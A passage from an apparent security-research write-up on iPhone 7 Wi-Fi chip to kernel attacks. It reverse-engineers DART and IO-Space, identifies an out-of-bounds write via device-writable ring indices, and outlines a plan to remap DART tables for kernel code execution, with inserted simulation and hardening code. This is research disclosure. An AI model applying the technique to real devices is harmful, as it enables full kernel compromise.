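    if (!lx_valid(l1t[b])) { uint64_t t = alloc_table(); if (!t) return -1; l1t[b] = lx_encode(t); }
    uint64_t *l2t = table_at(lx_target(l1t[b]));
    if (!l2t) return -1;
    l2t[c] = lx_encode(pa);
    return 0;
}

/* PAS -> IO-Space (the inverted table), by visiting every valid leaf. */
int dart_reverse(const struct dart_sim *d, uint64_t pa, uint64_t *iova)
{
    for (unsigned a = 0; a < L0_ENTRIES; a++) {
        uint64_t *l1t = l0_valid(d->l0[a]) ? table_at(l0_target(d->l0[a])) : NULL;
        for (unsigned b = 0; l1t && b < L1_ENTRIES; b++) {
            uint64_t *l2t = lx_valid(l1t[b]) ? table_at(lx_target(l1t[b])) : NULL;
            for (unsigned c = 0; l2t && c < L2_ENTRIES; c++) {
                if (!lx_valid(l2t[c]) || lx_target(l2t[c]) != (pa & ~(PAGE_SIZE - 1))) continue;
                uint64_t pfn = ((uint64_t)a << 18) | ((uint64_t)b << 9) | c;
                *iova = DART_IOVA_BASE + pfn * PAGE_SIZE + (pa & (PAGE_SIZE - 1));
                return 0;
            }
        }
    }
    return -1;
}

/* Constructed sample: two adjacent IO-Space pages mapped to made-up host physical pages. */
const struct dart_sim *demo_dart(void)
{
    static struct dart_sim d; static int built;
    if (!built) { dart_map(&d, 0x80000000ULL, 0x8A0001000ULL); dart_map(&d, 0x80001000ULL, 0x8A0002000ULL); built = 1; }
    return &d;
}
uint64_t dart_lookup(const struct dart_sim *d, uint64_t iova) { uint64_t pa; return dart_translate(d, iova, &pa) == 0 ? pa : 0; }
uint64_t dart_rlookup(const struct dart_sim *d, uint64_t pa)  { uint64_t io; return dart_reverse(d, pa, &io) == 0 ? io : 0; }
```

Calling dart_lookup(demo_dart(), 0x80000ABC) walks L0 index 0, L1 index 0, L2 index 0 and returns 0x8A0001ABC; 0x80002000 has no L2 descriptor and faults (returned as 0); dart_rlookup(demo_dart(), 0x8A0002010) recovers 0x80001010. Note that a lookup only ever consults descriptors marked valid, which is why a 4KB region that was never mapped faults rather than leaking whatever the table page held.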

At long last, we can test whether our deductions regarding DART’s structure are indeed valid. First, let’s extract the DART instance corresponding to the Wi-Fi chip. Then, using this object, we can proceed to dump the entire mapping between IO-Space addresses and their corresponding physical ranges by following DART’s translation hierarchy:

Great! The first few mappings appear sane -- each IO-Space address is translated into a corresponding physical range well within the host’s PAS. Moreover, we can see that our assumption regarding DART’s translation granule holds, as some mapped physical addresses are within a 4KB range from one another.

To be absolutely certain that our assessment is valid, let’s perform another short experiment. We’ll map-in an unused IO-Space address, pointing it at a physical address corresponding to “spare” data within the kernel’s BSS. Next, using the DMA hook we inserted previously, we’ll direct unconsumed DMA descriptors at the newly mapped IO-Space address. By doing so, subsequent DMA transfers should arrive at our chosen BSS address.

After inserting the hook and monitoring the mapped BSS range (by reading it through the kernel’s VAS), we are presented with the following result:

Awesome! We managed to DMA into an arbitrary physical address within the kernel’s BSS, thus confirming that our understanding of DART is correct.
Exploring DART

Using our newly acquired control over IO-Space, we can proceed to conduct a few experiments.

For starters, it would be interesting to see whether the kernel integrity mechanisms present on the iPhone 7 (“KTRR”, previously referred to as “AMCC”) still hold in the presence of malicious DMA attempts from the Wi-Fi chip. To find out, we’ll map each of the protected physical ranges (the kernel’s code segments, read-only segments, etc.) into IO-Space, insert the DMA hook, and observe their contents to see whether they were successfully modified.

Unsurprisingly, each attempt to DMA into a protected region results in a fault being raised, subsequently triggering a kernel panic and crashing the device. Attempting to DMA into KTRR’s hardware registers, which store the protected region ranges, similarly fails -- once the lockdown occurs, no modification of the registers is permitted.

Continuing our analysis of DART, let’s consider another edge-case scenario: assume two subsequent IO-Space mappings correspond to non-contiguous ranges of physical memory. In such a case, should DMA operations crossing the boundary between the two IO-Space ranges be permitted? If so, should the data be split across the corresponding physical ranges? Or should the transfer instead only utilise the first physical range?

To find out, we’ll conduct another experiment. First, we’ll create two IO-Space mappings pointing at disparate regions in the Kernel’s BSS. Then, using the DMA engine, we’ll initiate a transfer crossing the boundary between the two IO-Space addresses.

Running the above experiment and monitoring the resulting addresses through the kernel’s VAS, we are presented with a positive result -- DART correctly splits the transaction into the two corresponding physical ranges, thus never exceeding any of the mapped-in regions’ bounds.

So far, so good.
PCIe Configuration Space

Continuing our investigation of DART, we arrive at another query -- how does DART perform context determination? Namely, how does DART differentiate between the components issuing the memory access requests?

Depending on DART’s architecture, several solutions to this question exist. If each DART is assigned to a single component or a single PCIe bus, no identification is needed, as it can simply funnel all operations from that origin through its translation mechanism. Alternately, if several PCIe components exist on the bus to which DART is assigned, it could utilise the “Requester ID” (RID) field in the PCIe TLP to identify the originating component.

Using the RID for context determination is not risk-free, as malicious PCIe components may attempt to “spoof” the contents of their TLPs. To deal with such scenarios, PCIe introduced Access Control Services (ACS), allowing PCIe switches to perform routing decisions, including disallowing transfer of certain TLPs based on their encompassed IDs. As we are not aware of the PCIe topology on the iPhone, it remains unknown whether such a configuration is needed (or used).

With regards to control over the PCIe TLPs, Broadcom’s Wi-Fi chips expose much of the PCIe Core’s functionality to the Wi-Fi firmware by mapping the core’s registers through a fixed backplane address. Previous Broadcom SoC revisions, which incorporated PCIe Gen 1 cores, allowed access to several “diagnostic” registers (via pcieindaddr / pcieinddata), which govern the physical (PLP), data link (DLLP) and transport (TLP) layers of PCIe. Regardless, it is unknown whether this mechanism allows modification of the RID, or indeed whether this form of access is still present in current-gen Broadcom hardware.

Nevertheless, standardised PCIe mechanisms exist which may also affect the RID’s composition. For instance, PCIe 3.0 introduced Alternate Routing-ID Interpretation (ARI), which modifies the encoding of the RID, eliminating the “device” field while expanding the “function” field to 8 bits.

While the PCIe Configuration Space is normally accessed through the host, Broadcom’s Wi-Fi SoC also exposes it to the Wi-Fi firmware, through a pair of backplane registers corresponding to the PCIe Core (configaddr / configdata). Using these registers, the Wi-Fi firmware can not only read the PCIe Configuration Space, but also modify values within it. Like many advanced PCIe features, ARI is exposed in the configuration space through an “extended capability” blob; therefore, if ARI is supported by the PCIe core, we could utilise our access to the configuration space to enable the feature from the Wi-Fi firmware.

To determine whether such capabilities are present in the PCIe core, we’ll produce a dump of the configuration space (using the aforementioned register pair). After doing so, we can simply reorganise the contents in a format legible to lspci, and instruct it to parse the given data, producing a human-readable representation of the features supported by the PCIe core:

Scanning through the above capabilities, it appears that none of the “advanced” PCIe features (such as ARI) are supported by the PCIe core.
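The check performed above (handing the dump to lspci) boils down to walking the two capability lists in the configuration space. The following is an added example, not the post’s tooling: it walks both the standard list (pointer at byte 0x34) and the extended list (starting at 0x100) of a 4KB configuration-space dump held in memory and reports whether a given capability, such as ARI, is advertised. The dump it runs on is constructed inline; only the Broadcom vendor ID 0x14E4 is a real value, everything else in it is made up, and on the device the dump would instead be read out via the configaddr / configdata pair.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not the post's tooling: the capability-list walk lspci performs,
 * run over a 4KB configuration-space dump held in memory. The dump here is
 * constructed; on the device it would come from the configaddr/configdata pair. */
#define CFG_SIZE        4096
#define PCI_CAP_ID_PM   0x01     /* Power Management (standard list) */
#define PCI_CAP_ID_MSI  0x05
#define PCI_CAP_ID_EXP  0x10     /* PCI Express */
#define PCI_EXT_CAP_AER 0x0001   /* Advanced Error Reporting (extended list) */
#define PCI_EXT_CAP_ACS 0x000D   /* Access Control Services */
#define PCI_EXT_CAP_ARI 0x000E   /* Alternative Routing-ID Interpretation */

static uint16_t rd16(const uint8_t *cfg, size_t off) { return (uint16_t)(cfg[off] | (cfg[off + 1] << 8)); }
static uint32_t rd32(const uint8_t *cfg, size_t off) { return rd16(cfg, off) | ((uint32_t)rd16(cfg, off + 2) << 16); }

/* Standard list: status bit 4 announces it, byte 0x34 points at the first
 * {id, next} node, nodes live in 0x40..0xFF. Returns the node offset or 0. */
size_t find_cap(const uint8_t *cfg, uint8_t id)
{
    if (!(rd16(cfg, 0x06) & 0x10)) return 0;
    size_t off = cfg[0x34] & ~3u;
    for (int guard = 0; guard < 48 && off >= 0x40 && off < 0x100; guard++) {
        if (cfg[off] == id) return off;
        off = cfg[off + 1] & ~3u;          /* a next pointer of 0 ends the list */
    }
    return 0;
}

/* Extended list: starts at 0x100, header = id[15:0] | version[19:16] | next[31:20].
 * An all-zero or all-ones header means there are no extended capabilities. */
size_t find_ext_cap(const uint8_t *cfg, uint16_t id)
{
    size_t off = 0x100;
    for (int guard = 0; guard < 1024 && off >= 0x100 && off + 4 <= CFG_SIZE; guard++) {
        uint32_t hdr = rd32(cfg, off);
        if (hdr == 0 || hdr == 0xFFFFFFFFu) return 0;
        if ((hdr & 0xFFFF) == id) return off;
        off = (hdr >> 20) & ~3u;           /* next = 0 ends the list */
    }
    return 0;
}

static void put_ext_hdr(uint8_t *cfg, size_t off, uint16_t id, uint16_t next)
{
    uint32_t hdr = id | (1u << 16) | ((uint32_t)next << 20);   /* capability version 1 */
    for (int i = 0; i < 4; i++) cfg[off + i] = (uint8_t)(hdr >> (8 * i));
}

/* Constructed endpoint: PM and PCIe capabilities, AER, and optionally ARI.
 * Only the vendor ID (0x14E4, Broadcom) is a real value; the rest is made up. */
const uint8_t *demo_cfg(int with_ari)
{
    static uint8_t cfg[CFG_SIZE];
    memset(cfg, 0, sizeof cfg);
    cfg[0x00] = 0xE4; cfg[0x01] = 0x14;
    cfg[0x06] = 0x10;                        /* status: capabilities list present */
    cfg[0x34] = 0x48;                        /* first standard capability */
    cfg[0x48] = PCI_CAP_ID_PM;  cfg[0x49] = 0x58;
    cfg[0x58] = PCI_CAP_ID_EXP; cfg[0x59] = 0x00;
    put_ext_hdr(cfg, 0x100, PCI_EXT_CAP_AER, with_ari ? 0x150 : 0);
    if (with_ari) put_ext_hdr(cfg, 0x150, PCI_EXT_CAP_ARI, 0);
    return cfg;
}

int main(void)
{
    for (int ari = 0; ari < 2; ari++) {
        const uint8_t *cfg = demo_cfg(ari);
        printf("dump %d: PCIe cap @0x%zx, ARI ext cap @0x%zx, ACS ext cap @0x%zx\n", ari,
               find_cap(cfg, PCI_CAP_ID_EXP), find_ext_cap(cfg, PCI_EXT_CAP_ARI),
               find_ext_cap(cfg, PCI_EXT_CAP_ACS));
    }
    return 0;
}
```

Both walkers bound the number of nodes they follow and reject pointers outside the legal region, so a corrupted or looping list in a dump terminates rather than spinning; a result of 0 for ARI (or for ACS, which is what would matter on the switch side) is the same negative answer the lspci output above gave for the Wi-Fi chip’s PCIe core.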
Exploring IO-Space

While we’ve already determined how DART facilitates the IO-Space mapping for the Wi-Fi chip, we have yet to investigate the contents of the memory exposed through this mechanism. In order to investigate IO-Space’s contents, we’ll use a two-stage translation process; first, we’ll use our DART module to produce a mapping between the IO-Space addresses and their corresponding physical ranges. Once we obtain the mapped physical ranges, all that remains is to map these ranges into the kernel’s VAS, allowing us to subsequently dump their contents using our research platform.

As we know, the mapping from virtual to physical addresses is governed by the MMU’s translation tables. On ARMv8-A platforms (such as the iPhone 7), the ARM Virtual Memory System Architecture (VMSA) specifies the format of the translation tables utilised by the ARM MMU. Like any XNU task, the kernel’s translation tables are accessible through its task_t structure (exported through its data segment). Following the entries in the task structure, we arrive at its pmap, holding the translation tables.

Putting the two together, we can write some code in our research framework to locate the kernel’s task, extract the internal translation tables, and encapsulate the data therein in a module representing an ARMv8 translation table.

Using our new module, we can now perform translations between the virtual addresses in the kernel’s VAS and physical ones. Furthermore, we can invert the translation table, producing a (one-to-many) mapping from physical to virtual addresses. In tandem with our DART module, this allows us to take each IO-Space address, convert it to a physical address, and then use our inverted translation table to convert it back to a virtual address in the kernel’s VAS.

Consequently, we can now iterate over the entire IO-Space exposed to the Wi-Fi chip, extracting the contents of every mapped region:

After producing a copy of the entire contents of IO-Space, we can now comb through it, searching for any “accidental” mappings that might be beneficial for a would-be attacker present on the Wi-Fi chip.

For starters, recall that the kernel protects itself against remote attackers by utilising KASLR. This mitigation introduces a randomised “slide” value, which is added to the kernel’s base loading address (both virtual and physical). Since many exploits rely on the ability to pre-calculate addresses within the kernel’s VAS, such a mitigation may slow down attackers, or hinder the reliability of exploits targeting the kernel.

However, as the same “slide” value is applied globally, it is often the case that a single “leaked” kernel VAS address results in a KASLR bypass (allowing attackers to deduce the slide’s value). Therefore, if any kernel virtual address is accidentally leaked in an IO-Space mapped page, the Wi-Fi chip may be able to similarly subvert KASLR.

Apart from the potential implications regarding KASLR, the presence of any kernel VAS pointer in IO-Space would be worrisome, as the pointer might be utilised by kernel code. Allowing a malicious Wi-Fi chip to corrupt its value may subsequently affect the kernel’s behaviour (perhaps even resulting in code execution).

To find out whether any kernel pointers are exposed through IO-Space, let’s scan through the extracted IO-Space pages, searching for 64-bit words corresponding to addresses within the kernel’s VAS. After going through every single page, we are greeted with a negative result; we can find no kernel VAS pointers in any IO-Space mapped page!

With a cursory investigation of IO-Space out of the way, we can now dig deeper, attempting to gain a better understanding of the IO-mapped contents. To this end, we’ll combine several approaches:
Inspect each page’s contents to look for hints regarding its role
Locate the kernel code responsible for interacting with the same IO-Space range
Check the IO-Space address against posted addresses in the Wi-Fi firmware
Use the Android driver as reference for any “strange” unidentified constructs

After performing the above steps, we are finally able to piece together a complete mapping of IO-Space (thus also concluding that no “accidental” mappings are present). It is important to note that since IO-Space is not subject to randomisation, the IO addresses are constant, and are not affected by the KASLR slide.

Searching For Vulnerabilities

Having explored the aspects relating to DART, IO-Space mappings, and low-level components, let’s proceed to inspect the more traditional attack surfaces exposed by the host.

Recall that the Wi-Fi chip and the host communicate with one another through a series of “rings”, mapped into IO-Space. Each ring facilitates the transfer of information in a single direction; either from the device to the host (D2H), or vice versa (H2D).

Among the messages transferred through message rings, “Control Messages” represent a rather abundant attack surface. These messages are used to instruct the firmware to perform complex state-changing operations, such as creating additional message rings, deleting them, and even transporting high-level requests (ioctls) to be processed by the firmware.

Due to their complexity, control messages rely on a bidirectional communication channel; the “Control Submit” ring (H2D) allows the host to submit the requests to the device, while the “Control Complete” ring (D2H) is used by the device to return the results back to the host.

After committing messages to the D2H rings, the Wi-Fi firmware signals the host by writing to a “MailBox” register and triggering an MSI interrupt. This interrupt is subsequently handled by the host, which inspects the MailBox register, and notifies the corresponding (D2H) rings that data may be available for processing.

Tracing through the above flow, we reach the handler function for processing incoming control messages within the host. To assist in reverse-engineering these messages, we’ll utilise Broadcom’s Android driver (bcmdhd), which contains the definitions for the control structures, as well as the message codes corresponding to each request.


The encapsulating handler simply reads the “message type” field, and proceeds to delegate the message’s processing to a dedicated handler -- one per message type. Going over each of the handlers, we stumble across a memory corruption bug triggerable by the firmware. Incidentally, the bug was present in a handler for a message type which isn’t available in the Android driver.

Moving on, let’s set our sights on slightly higher targets in the protocol stack. Recall that control rings are also used to carry high-level control requests from the host to the firmware, dubbed “ioctls”. Each ioctl allows the host to either set a firmware-specific configuration value, or to retrieve its current value. As this channel is quite versatile, much of the high-level interaction between the host and the firmware is enacted through this channel, including retrieving the current channel, setting network configurations, and more.

However, like any other signal originating from the device, it is important to remember that “ioctls” can be co-opted by malicious Wi-Fi firmware. After all, an attacker controlling the Wi-Fi firmware can simply hook the “ioctl” handling function, thereby allowing full control over the contents transmitted back to the host.

Reverse-engineering the high-level driver, AppleBCMWLANCore, we quickly identify the entry point responsible for issuing ioctl requests from the host to the Wi-Fi firmware. Cross-referencing the function, we find nearly 500 call sites, several of which act as wrappers for common functionality, thus revealing even more originating call sites. After going over each of the aforementioned sites, we discover several memory corruptions in their corresponding handlers.

Lastly, there’s one more communication channel to consider -- Broadcom allows the in-band transmission of “event packets” from the Wi-Fi firmware to the host. These frames, denoted by a unique EtherType (0x886C), carry unsolicited events from the firmware, requiring special handling by the host. Tracing through the host’s RX path brings us to the entry point for handling such frames:


Once again, going over each handler in the above function (while using the Android driver to assist our understanding of the corresponding event codes and data structures), we discover two more vulnerabilities.
Better Vulnerabilities
Data Races?

While the vulnerabilities we just discovered allow us to trigger several forms of memory corruptions in the host (OOB writes, heap overflows), and even to leak constrained data from the host to the firmware, reliably exploiting any of them remains rather challenging.

For starters, the Wi-Fi chip has no visibility into the host’s memory (apart from the IO-Space mapped regions), and relatively little control over objects allocated within the kernel. Therefore, grooming the kernel’s memory in order to successfully launch a heap memory corruption attack would require significant effort. What’s more, this challenge is compounded by the presence of KASLR, preventing us from accurately locating the kernel’s data structures (barring any information disclosure).

Nonetheless, perhaps we can identify better primitives by digging deeper!

So far, we’ve only considered the contents of the data transferred between the host and the firmware. Effectively, we were thinking of the firmware and the host as two distinct entities, communicating with one another through an isolated communication channel. In fact, nothing could be further from the truth -- the two endpoints share a PCIe interface, allowing the firmware to perform DMA accesses at will to any IO-Space address.

One of the major risks when using a shared memory interface is the matter of timing. While the host and firmware normally synchronise their operations to ensure that no data races occur, attackers controlling the Wi-Fi firmware are bound by no such agreement. Using our control over the Wi-Fi chip, we can intentionally modify data structures within IO-Space as they are being accessed by the host. Doing so might allow us to introduce race conditions, such as TOCTTOUs, creating vulnerable conditions in otherwise safe code (under normal assumptions).

The first target for such modification are the control messages we inspected earlier on. Inspecting the control ring handler in the host, it appears that the messages are read directly from the IO-Space mapped buffer, raising the possibility for data races in their processing. Nonetheless, going over the relevant code paths, we find no security-relevant races.

What about the second control channel we reviewed -- event packets? Perhaps we could modify a packet’s contents while it is being processed, thereby affecting the kernel’s behaviour? Once again, the answer is negative; each transferred packet is first copied from its IO-Space mapped buffer to a kernel-resident mbuf before subsequently passing it on for processing, thus eliminating the possibility of firmware-induced races.
Message Rings, Revisited

So far, we’ve inspected the high-level functionality provided by message rings, namely, the control messages transported therein. However, we’ve neglected several aspects of their operation. One implementation detail of particular note is the method through which rings allow the endpoints to synchronise their accesses to the ring.

To allow concurrent accesses by both the ring’s consumer and its corresponding producer, each ring is assigned a pair of indices: a read index specifying the location up to which the consumer has read the messages, and a write index specifying the location at which the next message will be submitted by the producer. As their name implies, each ring forms a circular buffer -- upon arriving at the last ring index, the indices simply wrap around, returning back to the ring’s base.

Since both endpoints must be aware of the ring indices to successfully coordinate their access, a mechanism must exist through which the indices may be shared between the two. In Apple’s case, this is achieved by mapping all the indices into IO-Space mapped buffers.

While mapping the indices into IO-Space is a convenient way to share their values, it is not risk-free. For starters, if all the above indices are mapped into IO-Space, a malicious Wi-Fi chip may not only utilise DMA access to read them, but may also be able to modify them.

This form of access is excessive -- after all, the device need only update the read indices for H2D rings, and the write indices for D2H rings. The remaining indices should, at most, be read by the device. However, as DART’s implementation is proprietary, it is unknown whether it can facilitate read-only mappings. Consequently, all of the above indices are mapped into IO-Space as both readable and writable, thus allowing a malicious Wi-Fi chip to freely alter their values.

This IO-Space-based index sharing mechanism raises an important question; what if a Wi-Fi chip were to maliciously modify a ring’s indices while the ring is being processed by the host? Would doing so introduce a race condition? To find out, let’s take a look at the function through which the host submits messages into H2D rings:

1.  void* AppleBCMWLANPCIeSubmissionRing::workloopSubmitTx(uint32_t* p_read_index,
2.                                                         uint32_t* p_write_index) {
3.
4.      //Getting the write index from the IO-Space mapped buffer (!)
5.      uint32_t write_index = *(this->write_index_ptr);
6.
7.      //Iterating until there are no more events to process
8.      while (this->getRemainingEvents(p_read_index, p_write_index)) {
9.
10.         //Calculate the next insertion address based on the write index
11.         void* ring_addr = this->ring_base + this->item_size * write_index;
12.         uint32_t max_events = this->calculateRemainingWriteSpace();
13.
14.         //Writing the current events to the ring
15.         uint32_t num_written = this->submit_func(..., ring_addr, max_events);
16.         if (!num_written)
17.             break; //No more events to process
18.
19.         //Update the write index
20.         write_index += num_written;
21.         if (write_index >= this->max_index)
22.             write_index = 0; //Wrap around
23.
24.         //Commit the new index to the IO-Space mapped buffer (!)
25.         *(this->write_index_ptr) = write_index;
26.     }
27.     ...
28. }
29.
30. class AppleBCMWLANPCIeSubmissionRing {
31.     ...
32.     uint32_t max_index;          //The maximal ring index (off 88)
33.     uint32_t item_size;          //The size of each item (off 92)
34.     uint32_t* read_index_ptr;    //IO-Space mapped read index pointer (off 174)
35.     uint32_t* write_index_ptr;   //IO-Space mapped write index pointer (off 184)
36.     void* ring_base;             //IO-Space mapped ring base address (off 248)
37. };
function 0xFFFFFFF006D36D04

Alright! Looking at the above function immediately raises some red flags…

The function appears to read values from IO-Space mapped buffers in several different locations, seemingly making no effort to coordinate the read values. This kind of pattern opens the door to the possibility of race conditions induced by the firmware.

Let’s focus on the “write index” utilised by the function. At first, the index is fetched by reading its value directly from the IO-Space mapped buffer (line 5). This same value is then used to derive the location to which the next ring item will be written (line 11). Crucially, however, the value is not used in any shape or form by the surrounding verifications utilised by the function to decide whether the current ring indices are valid (lines 8, 12).

Therefore, the verification methods must re-fetch the indices’ values, introducing a possible discrepancy between the value used during verification, and the one used to place the next item.

To exploit the above issue, an attacker controlling the Wi-Fi chip can DMA into the ring indices in order to introduce one value for the ring address calculation (line 5), while quickly switching the index to a different, valid value for the remaining validations (lines 8, 12). If the above race is executed successfully, the following H2D item will be submitted by the host at an arbitrary attacker-controlled offset from the ring’s base, triggering an out-of-bounds write!

Removing The Race Condition

While the above primitive is no doubt useful, it has one inherent downside -- performing a data race from an external vantage point may be a difficult feat, especially considering the platform we’re executing on (an ARM Cortex R) is significantly slower than the targeted one (a full-blown application processor).

Perhaps by gaining a better understanding of the primitive, we can deal with these limitations. To this end, let’s take a closer look at the validation performed by the submission function:

1.  uint32_t AppleBCMWLANPCIeSubmissionRing::calculateRemainingWriteSpace() {
2.
3.      uint32_t read_index, write_index;
4.      this->getIndices(&read_index, &write_index);
5.
6.      //Did the ring wrap around?
7.      if (read_index > write_index)
8.          return read_index - (write_index + 1);
9.      else
10.         return this->max_index - write_index + (read_index ? 0 : -1);
11. }
12.
13. void AppleBCMWLANPCIeSubmissionRing::getIndices(uint32_t* rindex,
14.                                                 uint32_t* windex) {
15.     uint32_t read_index = *(this->read_index_ptr);
16.     uint32_t write_index = *(this->write_index_ptr);
17.     if (read_index >= 0x10000 || write_index >= 0x10000)
18.         panic(...);
19.     *rindex = read_index;
20.     *windex = write_index;
21. }

Ah-ha! Looking at the code above, we can identify yet another fault.

When fetching the ring indices, the getIndices function attempts to validate their values to ensure that they do not exceed the allowed ranges. This is undoubtedly a good idea, as it prevents corrupted values from being utilised (which may result in memory corruption).

However, instead of comparing the indices against the current ring’s capacity, they are compared against a fixed maximal value: 0x10000. While this value is certainly an upper bound on the rings’ capacities, it is far from a tight bound (in fact, most rings only hold several hundred items at most).

Therefore, observing the code above we reach two immediate conclusions. First, if we were to attempt a race condition whereby the ring index is modified to a value larger than the fixed bound (0x10000), we run the risk of triggering a kernel panic should the race attempt fail (line 18). More importantly, however, modifying the write index to any value below the fixed bound (but still above the actual ring’s bounds), will allow us to pass the validations above, resulting in an out-of-bounds write with no race-condition required.

Using the above primitive, we can target any H2D ring, causing the next element to be reliably inserted at an out-of-bounds address within the kernel’s VAS! While the affected range is limited to the ring’s item size multiplied by the aforementioned fixed bound, as we’ll see later on, that’s more than enough.
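The two defects above, the index re-fetched between its use and its validation (workloopSubmitTx) and the validation against a global 0x10000 rather than the ring’s own capacity (getIndices), are easiest to see side by side in a small model. The following is an added example and not Apple’s code: a host-side model of an H2D submission ring whose index pair sits in a device-writable buffer, with the original-style submission step next to a hardened one that takes a single snapshot of the indices and bounds it by this ring’s max_index. The ring geometry (256 items of 64 bytes) and the index value the device has written (0x1000) are constructed for the demonstration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Added example (not Apple's code): a host-side model of an H2D submission
 * ring whose index pair sits in a device-writable (IO-Space mapped) buffer.
 * It places the fixed-bound check from getIndices() beside a check against
 * the ring's own capacity that also decides everything from one snapshot. */
struct shared_indices { uint32_t read_index; uint32_t write_index; };

struct h2d_ring {
    uint32_t max_index;                   /* items in the ring */
    uint32_t item_size;                   /* bytes per item */
    volatile struct shared_indices *idx;  /* IO-Space mapped, so the device can DMA into it */
    uint8_t *ring_base;                   /* kernel VA of the ring buffer */
};

#define RING_BYTES(r) ((size_t)(r)->max_index * (r)->item_size)
#define REFUSED ((size_t)-1)

/* As in the text: both indices only have to be below 0x10000. */
int get_indices_fixed_bound(const struct h2d_ring *r, uint32_t *ri, uint32_t *wi)
{
    uint32_t read_index = r->idx->read_index, write_index = r->idx->write_index;
    if (read_index >= 0x10000 || write_index >= 0x10000) return -1;  /* panic() in the original */
    *ri = read_index; *wi = write_index;
    return 0;
}

/* Hardened: the bound is this ring's capacity, so any index that passes
 * also addresses a slot inside the ring buffer. */
int get_indices_capacity_bound(const struct h2d_ring *r, uint32_t *ri, uint32_t *wi)
{
    uint32_t read_index = r->idx->read_index, write_index = r->idx->write_index;
    if (read_index >= r->max_index || write_index >= r->max_index) return -1;
    *ri = read_index; *wi = write_index;
    return 0;
}

/* calculateRemainingWriteSpace() from the text, evaluated on a given snapshot. */
uint32_t remaining_write_space(const struct h2d_ring *r, uint32_t read_index, uint32_t write_index)
{
    if (read_index > write_index)
        return read_index - (write_index + 1);
    return r->max_index - write_index + (read_index ? 0 : -1);
}

/* One submission step: returns the byte offset of the slot the next item would
 * be written to, or REFUSED. The original-style path derives the slot from a
 * separate read of the shared index (line 5 of workloopSubmitTx), so the value
 * validated (line 12) and the value used need not be the same one. The hardened
 * path validates one snapshot against the capacity and uses only that snapshot. */
size_t submission_slot(const struct h2d_ring *r, int hardened)
{
    uint32_t ri, wi;
    if (hardened) {
        if (get_indices_capacity_bound(r, &ri, &wi) != 0) return REFUSED;
        if (remaining_write_space(r, ri, wi) == 0) return REFUSED;    /* ring full */
        return (size_t)wi * r->item_size;                             /* always < RING_BYTES(r) */
    }
    uint32_t slot_index = r->idx->write_index;                        /* read #1 */
    if (get_indices_fixed_bound(r, &ri, &wi) != 0) return REFUSED;    /* read #2 */
    if (remaining_write_space(r, ri, wi) == 0) return REFUSED;
    return (size_t)slot_index * r->item_size;
}

/* Constructed scenario: a 256-item ring of 64-byte items, after the device
 * has written write_index = 0x1000 (inside 0x10000, outside the ring). */
static struct shared_indices demo_idx = { 0, 0x1000 };
static uint8_t demo_buf[256 * 64];
const struct h2d_ring demo_ring = { 256, 64, &demo_idx, demo_buf };

int slot_within_ring(const struct h2d_ring *r, size_t slot) { return slot != REFUSED && slot < RING_BYTES(r); }

int main(void)
{
    size_t weak = submission_slot(&demo_ring, 0), strong = submission_slot(&demo_ring, 1);
    printf("fixed bound:    slot offset 0x%zx in a 0x%zx-byte ring -> %s\n", weak, RING_BYTES(&demo_ring),
           slot_within_ring(&demo_ring, weak) ? "inside" : "OUT OF BOUNDS");
    printf("capacity bound: %s\n", strong == REFUSED ? "refused" : "accepted");
    return 0;
}
```

With the fixed bound, write_index 0x1000 passes getIndices, the free-space arithmetic underflows to a value far larger than the ring (256 - 0x1000 - 1 in 32-bit unsigned), and the next item lands at byte offset 0x40000 of a 0x4000-byte ring; with the capacity bound the same index is refused before any address is derived. The single-snapshot rule is what removes the race described earlier: there is no second read of the shared index for the device to change in between.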

Triggering the Primitive

Before pressing on, it’s important that we prove that the scenario above is indeed feasible. After all, many components within the kernel might utilise the modified ring indices, which, in turn, may enforce their own validations.

To do so, we’ll perform a short experiment using our research platform. First, we’ll select an H2D ring, and fetch its corresponding object within the kernel. Using the aforementioned object, we can then locate the ring’s base address, allowing us to inspect its contents. Now, we’ll modify the ring indices by utilising the firmware’s DMA engine, while concurrently monitoring the kernel virtual address at the targeted offset for modification. If the primitive is triggered successfully, we should expect an item to be inserted at the target offset from the ring’s base address.

However, running the above experiment results in a resounding failure! Every attempt to trigger the out-of-bounds write results in a kernel panic, thereby crashing the device. Inspecting the panic logs reveals the source of this crash:

It appears that when executing our attack, the firmware attempts to perform a DMA read operation from an address beyond its IO-Space mapped ranges! Taking a moment to reflect on this, the source of the error is immediately apparent: since both the firmware and the host share the ring indices through IO-Space, modifying the aforementioned values affects not only the host, but also the firmware’s implementation of the MSGBUF protocol.

Namely, the firmware attempts to read the ring’s contents using the corrupted indices, resulting in an out-of-bounds access to IO-Space, triggering the above panic.

As we have control over the firmware, we could simply try to intercept the corresponding code paths in its MSGBUF implementation, thus preventing it from issuing the malformed DMA request. Unfortunately, this approach is easier said than done - the firmware’s implementation of MSGBUF is woven into many code paths in both the ROM and RAM; attempting to patch out each part results in either breakage of a different component, or in undesired side-effects.

Instead of addressing the sources of the DMA transfers, we’ll go straight to the target -- the engine itself. Recall that each DMA engine on the firmware is accessible through an instance of a single structure (dma_info). Changing the DMA engine’s backplane register pointers within the dma_info structure would mean that while the calling code-paths are able to continue issuing malformed DMA requests, the requests themselves are never actually received by the DMA engine, thus preventing us from triggering a fault.

Indeed, incorporating the above patch into our vulnerability trigger, we can now freely modify the ring indices without inducing a crash. Furthermore, inspecting the corresponding kernel virtual address at the targeted index, we can see that our overwrite is finally successful!

Devising An Exploit Plan

Having concluded that the primitive is usable, we can now proceed to the next stage -- devising an exploit plan. Namely, we must decide on a data structure to target using the exploit primitive, which may allow us to either modify the kernel’s behaviour, or otherwise gain a useful primitive bringing us closer to that goal.

So which data structure should we target? As we do not have any visibility into the kernel’s address space, reliably locating structures within the kernel presents quite a challenge. What’s more, our primitive only allows limited control over the written content (namely, the data written by the host is an H2D ring item). On top of that, each OOB element can only be written at offsets which are multiples of the ring’s item size, thus introducing alignment constraints.

The above limitations make reliable exploitation rather difficult. Alas, if only there were a data structure whose internal composition were relatively flexible, and to which a single modification would grant us complete control over the host…

...But of course, we’ve already come across the perfect target -- DART’s translation tables!

Recall that DART’s translation tables govern over the mapping between IO-Space and the host’s physical address space. If we were able to use our primitive in order to modify the tables, we might be able to introduce new mappings into IO-Space, pointing at arbitrary physical ranges within the host’s PAS. Mapping in arbitrary physical memory into the Wi-Fi chip is a nearly ideal primitive, as it would allow the chip to modify any data structure used by the kernel, leading to trivial code execution.

